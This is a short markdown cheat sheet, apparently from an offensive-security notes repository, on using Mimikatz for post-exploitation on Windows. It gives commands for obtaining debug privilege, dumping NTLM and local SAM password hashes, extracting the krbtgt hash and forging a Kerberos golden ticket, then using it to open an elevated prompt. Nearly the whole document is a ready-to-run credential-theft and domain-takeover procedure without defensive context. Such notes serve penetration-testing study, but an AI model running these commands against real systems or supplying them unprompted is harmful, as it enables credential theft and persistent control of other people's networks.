killchain-compendium/post_exploitation/docs/mimikatz.md

30 lines
539 B
Markdown

# Mimikatz Usage
* Check your privilege, boy
```sh
$ privilege::debug
```
## Dump hashes
* NTLM
```sh
$ lsadump::lsa /patch
```
## Dump Local Password hashes
```sh
token::elevate
```
```sh
lsadump::sam
```
## Golden ticket
* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi
```sh
$ lsadump::lsa /inject /name:krbtgt
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
```
* use the golden ticket, open a new elevated prompt
```sh
misc::cmd
```